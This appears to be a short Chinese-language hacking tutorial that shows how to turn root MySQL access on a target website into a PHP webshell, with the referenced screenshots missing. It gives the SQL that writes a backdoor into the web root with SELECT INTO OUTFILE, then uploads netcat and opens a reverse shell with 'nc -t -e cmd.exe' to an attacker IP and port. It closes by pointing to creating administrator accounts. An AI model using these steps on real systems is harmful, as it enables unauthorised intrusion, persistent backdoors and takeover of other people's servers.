在获得目标网站的mysql权限之后，可进一步获取网站webshell，此方法前提①mysql权限是root，②获取到了网站的绝对路径。

获取数据库权限的方法，可以尝试sql注入（方法参见:www.2cto.com/Article/201209/153277.html ）。
获取了mysql的root权限后，在数据库中新建一个表，表内有一个字段，字段内填入php后门代码，如create table doortable ( backdoor varchar(1000) ); 然后 insert into doortable (backdoor) values (“hello world”);，实际内容改为php后门代码， 插入成功后，执行命令select * from doortable into outfile “c:\apache\htdocs\tem.php”, （实际操作中填入目标网站的绝对路径）。

然后我们在自己的机器上去访问这个php文件，效果如图：



我们可以在webshell中执行命令,如执行tasklist，效果如图：


 

我们还可以上传自定义的文件到目标网站的路径，如上传一个nc程序,进一步建立一个反弹链接。选择下载文件中nc.exe，点击上传。

上传成功后，首先在我们本机上监听一个端口，命令：nc -vv -l -p 8080，然后通过我们的php后门文件在服务器端执行命令：nc -t -e C:\windows\system32\cmd.exe 192.168.1.102 8080。稍后，应该就在我们本地监听的cmd中，建立了一个链接，出现目标主机的shell，如图：


然后就是net user新建管理员用户等等。。。